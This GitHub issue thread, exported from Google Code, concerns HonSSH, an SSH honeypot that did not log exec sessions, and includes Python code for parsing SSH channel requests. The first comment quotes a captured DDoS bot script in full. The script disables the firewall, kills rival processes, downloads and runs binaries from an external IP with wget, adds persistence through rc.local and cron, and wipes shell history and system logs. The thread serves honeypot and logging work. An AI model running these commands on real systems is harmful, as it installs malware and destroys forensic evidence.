tnich / honssh

HonSSH is designed to log all SSH communications between a client and server.
https://github.com/tnich/honssh
BSD 3-Clause "New" or "Revised" License

Exec-Sessions do not get logged #9

Closed GoogleCodeExporter closed 9 years ago

GoogleCodeExporter commented 9 years ago
Another discovery:

exec-sessions (message 98 with data = exec) do not get logged, only
pty-sessions (message 98 with data = pty-req).

Also, message 98 with data = exec should be logged directly to the tty-log as
user input.

Here is an example message from a DDoS bot which attacked my honeypot:

2014-03-01 10:35:01+0100 [HonsshServerTransport,3,116.27.9.0] SERVER: 
MessageNum: 98 Encrypted 
'\x00\x00\x00\x00\x00\x00\x00\x04exec\x01\x00\x00\x10\x88/etc/init.d/iptables 
stop\necho "nameserver 8.8.8.8" >> /etc/resolv.conf\necho "nameserver 8.8.4.4" 
>> /etc/resolv.conf\nyum -y install wget\nchmod 7777 / etc\nkillall -9 
.IptabLes\nkillall -9 nfsd4\nkillall -9 profild.key\ncd /etc;rm -rf dir 
fake.cfg\nkillall -9 nfsd\nkillall -9 DDosl\nkillall -9 lengchao32\nkillall -9 
b26\nkillall -9 Bill\nkillall -9 n26\nkillall -9 1\nkillall -9 
codelove\nkillall -9 32\nkillall -9 m32\nkillall -9 m64\nkillall -9 64\nkillall 
-9 83BOT \nkillall -9 82BOT\nkillall -9 dos64\nkillall -9 dos32\nkillall -9 
new6\nkillall -9 new4\nkillall -9 node24\nkillall -9 mimi\nkillall -9 
nodeJR-1\nkillall -9 freeBSD\nkillall -9 ksapdd\nkillall -9 kysapdd\nkillall -9 
sksapdd\nkillall -9 xsw \nkillall -9 syslogd\nkillall -9 skysapdd\nkillall -9 
cupsddd\nkillall -9 ksapd\nkillall -9 atddd\nkillall -9 xfsdxd\ncd /etc;chattr 
-i cupsdd\ncd /root; chmod 7777 / etc\nkillall -9 minerd\nkillall -9 0\nkillall 
-9 joudckfr\nkillall -9 www\nkillall -9 log\nkillall -9 .IptabLex\nkillall -9 
.Mm2\nkillall -9 acpid\nkillall -9 m64 \nkillall -9 ./QQ\nkillall -9 
QQ\nkillall -9 g3\nkillall -9 2\nkillall -9 3\nkillall -9 pm\nkillall -9 
qweasd\nkillall -9 tangtang\nkillall -9 imap-login\nkillall -9 cupsdd\nkillall 
-9 xudp\nkillall -9 txma\nkillall -9 mrdos64.b00\nkillall -9 
mrdos32.b00\nkillall -9 kkpklp\nkillall -9 kiilp\nkillall -9 xin1\nkillall -9 
jibateng\ncd /root;rm -rf dir nohup.out\ncd /etc;rm -rf dir cupsddd\ncd /etc;rm 
-rf dir atddd\ncd /etc;rm -rf dir ksapdd\ncd /etc;rm -rf dir kysapdd\ncd 
/etc;rm -rf dir sksapdd\ncd /etc;rm -rf dir skysapdd\ncd /etc;rm -rf dir 
xfsdxd\ncd /etc;rm -rf dir fake.cfg\ncd /etc;rm -rf dir cupsddd.*\ncd /etc;rm 
-rf dir atddd.*\ncd /etc;rm -rf dir ksapdd.*\ncd /etc;rm -rf dir kysapdd.*\ncd 
/etc;rm -rf dir sksapdd.*\ncd /etc;rm -rf dir skysapdd.*\ncd /etc;rm -rf dir 
xfsdxd.*\ncd /etc;rm -rf dir cupsdd\ncd /etc;rm -rf dir atdd\ncd /etc;rm -rf 
dir ksapd\ncd /etc;rm -rf dir kysapd\ncd /etc;rm -rf dir sksapd\ncd /etc;rm -rf 
dir skysapd\ncd /etc;rm -rf dir xfsdx\ncd /etc;rm -rf dir fake.cfg\ncd /etc;rm 
-rf dir cupsdd.*\ncd /etc;rm -rf dir atdd.*\ncd /etc;rm -rf dir ksapd.*\ncd 
/etc;rm -rf dir kysapd.*\ncd /etc;rm -rf dir sksapd.*\ncd /etc;rm -rf dir 
skysapd.*\ncd /etc;rm -rf dir xfsdx.*\ncd /var/spool/cron; rm -rf dir 
root.*\ncd /var/spool/cron; rm -rf dir root\ncd /var/spool/cron/crontabs; rm 
-rf dir root.*\ncd /var/spool/cron/crontabs; rm -rf dir root\ncd 
/var/spool/cron ;wget http://122.224.34.75:8182/root\ncd 
/var/spool/cron/crontabs ;wget http://122.224.34.75:8182/root\ncd /etc;wget 
http://122.224.34.75:8182/cupsdd\ncd /etc;wget 
http://122.224.34.75:8182/ksapdd\ncd /etc;wget 
http://122.224.34.75:8182/kysapdd\ncd /etc;wget 
http://122.224.34.75:8182/atddd\ncd /etc;wget 
http://122.224.34.75:8182/skysapdd\ncd /etc;wget 
http://122.224.34.75:8182/sksapdd\ncd /etc;wget 
http://122.224.34.75:8182/xfsdxd\ncd /etc;chmod 7777 xfsdxd\ncd /etc;chmod 7777 
atddd\ncd /etc;chmod 7777 cupsdd\ncd /etc;chmod 7777 ksapdd\ncd /etc;chmod 7777 
kysapdd\ncd /etc;chmod 7777 skysapdd\ncd /etc;chmod 7777 sksapdd\nnohup 
/etc/xfsdxd > /dev/null 2>&1&\nnohup /etc/cupsdd > /dev/null 2>&1&\nnohup 
/etc/ksapdd > /dev/null 2>&1&\nnohup /etc/kysapdd > /dev/null 2>&1&\nnohup 
/etc/atddd > /dev/null 2>&1&\nnohup /etc/skysapdd > /dev/null 2>&1&\nnohup 
/etc/sksapdd > /dev/null 2>&1&\necho "cd /etc;./ksapdd" >> /etc/rc.local \necho 
"cd /etc;./kysapdd" >> /etc/rc.local \necho "cd /etc;./atddd" >> /etc/rc.local 
\necho "cd /etc;./ksapdd" >> /etc/rc.local \necho "cd /etc;./skysapdd" >> 
/etc/rc.local \necho "cd /etc;./xfsdxd" >> /etc/rc.local \necho "unset 
MAILCHECK" >> /etc/profile\ncd /etc;chattr +i cupsdd\nrm -rf 
/root/.bash_history\ntouch /root/.bash_history\nhistory -r\ncd /var/log > dmesg 
\ncd /var/log > auth.log \ncd /var/log > alternatives.log \ncd /var/log > 
boot.log \ncd /var/log > btmp \ncd /var/log > cron \ncd /var/log > cups \ncd 
/var/log > daemon.log \ncd /var/log > dpkg.log \ncd /var/log > faillog \ncd 
/var/log > kern.log \ncd /var/log > lastlog\ncd /var/log > maillog \ncd 
/var/log > user.log \ncd /var/log > Xorg.x.log \ncd /var/log > anaconda.log 
\ncd /var/log > yum.log \ncd /var/log > secure\ncd /var/log > wtmp\ncd /var/log 
> utmp \ncd /var/log > messages\ncd /var/log > spooler\ncd /var/log > 
sudolog\ncd /var/log > aculog\ncd /var/log > access-log\ncd /root > 
.bash_history\nhistory -c\necho 
\xcc\xe1\xca\xbe----\xc3\xfc\xc1\xee\xd6\xb4\xd0\xd0\xb3\xc9\xb9\xa6\nsleep 600'

Original issue reported on code.google.com by flofriha...@gmail.com on 1 Mar 2014 at 1:10

GoogleCodeExporter commented 9 years ago
Another nice find :D

Thanks,

Original comment by tnn...@googlemail.com on 1 Mar 2014 at 1:20

GoogleCodeExporter commented 9 years ago
Here is my dirty implementation for that in server.py:

...
            elif messageNum == 98:
                # SSH_MSG_CHANNEL_REQUEST: uint32 recipient channel, then a
                # string (uint32 length + bytes) holding the request type.
                # payload[7:8] is the low byte of that length field.
                num = int(payload[7:8].encode('hex'), 16)
                data = payload[8:8+num]
                if data == 'pty-req':
                    self.isPty = True
                    ttylog.ttylog_open(self.ttylog_file, time.time())
                elif data == 'exec':
                    # Treat an exec request like a pty session so it gets a
                    # tty log, then write the requested command into that log.
                    self.isPty = True
                    ttylog.ttylog_open(self.ttylog_file, time.time())
                    # For 'exec': 4 (channel) + 4 + 4 ('exec') + 1 (want_reply)
                    # + 4 (command length) = 17 bytes precede the command.
                    data = ">>> " + payload[17:] + "\n"
                    ttylog.ttylog_write(self.ttylog_file, len(data), ttylog.TYPE_OUTPUT, time.time(), data)
            elif messageNum == 94:
...

Original comment by flofriha...@gmail.com on 1 Mar 2014 at 1:28
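The following is an added example and not HonSSH's own code; it is not the fix above either. It parses the SSH_MSG_CHANNEL_REQUEST (message 98) payload described in the first comment, tells pty-req and exec requests apart, recovers the exec command, and marks each line of a multi-line command as client input for a tty log. The only assumption is the wire layout from RFC 4254 section 5.4 (uint32 channel, string request type, boolean want_reply, then type-specific fields); it reads the full uint32 length fields rather than a single byte. The sample payloads, function names and the ">>> " prefix are constructed for this example; the exec sample reuses the first two and last lines of the script captured above.

```python
# Added example, not HonSSH code: decode an SSH_MSG_CHANNEL_REQUEST payload
# (message number 98, RFC 4254 section 5.4).  The payload, i.e. everything
# after the message number byte, is laid out as:
#
#   uint32   recipient channel
#   string   request type   ("pty-req", "exec", "shell", "subsystem", ...)
#   boolean  want_reply
#   ...      type-specific data:
#              "exec":    string command
#              "pty-req": string TERM, uint32 cols, rows, width px, height px,
#                         string encoded terminal modes
#
# An SSH "string" is a big-endian uint32 length followed by that many bytes.
import struct

SSH_MSG_CHANNEL_REQUEST = 98


def _read_uint32(buf, off):
    """Read a big-endian uint32 at offset off; return (value, new offset)."""
    if off + 4 > len(buf):
        raise ValueError("truncated uint32 at offset %d" % off)
    return struct.unpack(">I", buf[off:off + 4])[0], off + 4


def _read_string(buf, off):
    """Read one SSH 'string' at offset off; return (bytes, new offset)."""
    n, off = _read_uint32(buf, off)
    if off + n > len(buf):
        raise ValueError("string of length %d overruns payload" % n)
    return buf[off:off + n], off + n


def parse_channel_request(payload):
    """Decode a message-98 payload into a dict.

    Always present: 'channel', 'type', 'want_reply'.  For 'exec' the dict also
    carries 'command'; for 'pty-req' it carries 'term', 'cols' and 'rows'.
    Raises ValueError on a truncated or inconsistent payload.
    """
    channel, off = _read_uint32(payload, 0)
    rtype, off = _read_string(payload, off)
    if off >= len(payload):
        raise ValueError("missing want_reply byte")
    want_reply = payload[off] != 0
    off += 1
    req = {"channel": channel,
           "type": rtype.decode("ascii", "replace"),
           "want_reply": want_reply}
    if rtype == b"exec":
        cmd, off = _read_string(payload, off)
        # Bot scripts are often not valid UTF-8 (the captured one ends in
        # non-ASCII bytes), so decode leniently rather than dropping them.
        req["command"] = cmd.decode("utf-8", "replace")
    elif rtype == b"pty-req":
        term, off = _read_string(payload, off)
        cols, off = _read_uint32(payload, off)
        rows, off = _read_uint32(payload, off)
        req.update({"term": term.decode("ascii", "replace"),
                    "cols": cols, "rows": rows})
    return req


def format_exec_for_ttylog(command, prefix=">>> "):
    """Prefix every line of a (possibly multi-line) exec command so client
    input can be told apart from server output in the tty log."""
    return "".join(prefix + line + "\n" for line in command.split("\n"))


def build_exec_request(channel, command, want_reply=True):
    """Encode an 'exec' channel request; used here to construct sample input."""
    return (struct.pack(">I", channel)
            + struct.pack(">I", 4) + b"exec"
            + (b"\x01" if want_reply else b"\x00")
            + struct.pack(">I", len(command)) + command)


# Constructed sample: first two and last lines of the captured bot script,
# framed exactly like the logged message (channel 0, want_reply set).
SAMPLE_EXEC_PAYLOAD = build_exec_request(
    0,
    b'/etc/init.d/iptables stop\n'
    b'echo "nameserver 8.8.8.8" >> /etc/resolv.conf\n'
    b'sleep 600')

# Constructed sample: an interactive "pty-req" (TERM=xterm, 80x24, no pixel
# sizes, empty terminal-modes string).
SAMPLE_PTY_PAYLOAD = (struct.pack(">I", 0)
                      + struct.pack(">I", 7) + b"pty-req" + b"\x01"
                      + struct.pack(">I", 5) + b"xterm"
                      + struct.pack(">IIII", 80, 24, 0, 0)
                      + struct.pack(">I", 0))


if __name__ == "__main__":
    for payload in (SAMPLE_EXEC_PAYLOAD, SAMPLE_PTY_PAYLOAD):
        req = parse_channel_request(payload)
        print(req)
        if req["type"] == "exec":
            print(format_exec_for_ttylog(req["command"]), end="")
```

Running the block prints both decoded requests and the prefixed command lines. Because every length field is validated against the remaining payload, a truncated or malformed request raises ValueError instead of silently logging a partial command, which matters for a honeypot that will see deliberately odd clients.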

GoogleCodeExporter commented 9 years ago
Thanks for your fix. I've implemented it and also added better support for 
catching unknown SSH sessions :)

Hopefully when someone else connects you can let me know how it goes?

Cheers,
Peg

Original comment by tnn...@googlemail.com on 1 Mar 2014 at 2:23

GoogleCodeExporter commented 9 years ago
I have updated my 24/7 honeypot to the latest version. Will let you know when
I have the first results ^^

Original comment by flofriha...@gmail.com on 1 Mar 2014 at 2:32

GoogleCodeExporter commented 9 years ago
This looks much better! Only a little hard to distinguish between input and
output, because the input has multiple lines, but that is only a design problem ^^

Will also open some more tickets later because of unknown ssh-packets.

Original comment by flofriha...@gmail.com on 1 Mar 2014 at 4:47

GoogleCodeExporter commented 9 years ago
Haha yeah, I've just got round to properly testing it myself and noticed all 
the unknown ssh-packets, my bad. 

I'll have a think about the input and output issue.

Original comment by tnn...@googlemail.com on 1 Mar 2014 at 5:02

GoogleCodeExporter commented 9 years ago
Fixed the unknown packets and logged the EXEC commands to the text log as well.

Original comment by tnn...@googlemail.com on 1 Mar 2014 at 5:53

GoogleCodeExporter commented 9 years ago
Issue 14 has been merged into this issue.

Original comment by tnn...@googlemail.com on 3 Mar 2014 at 3:52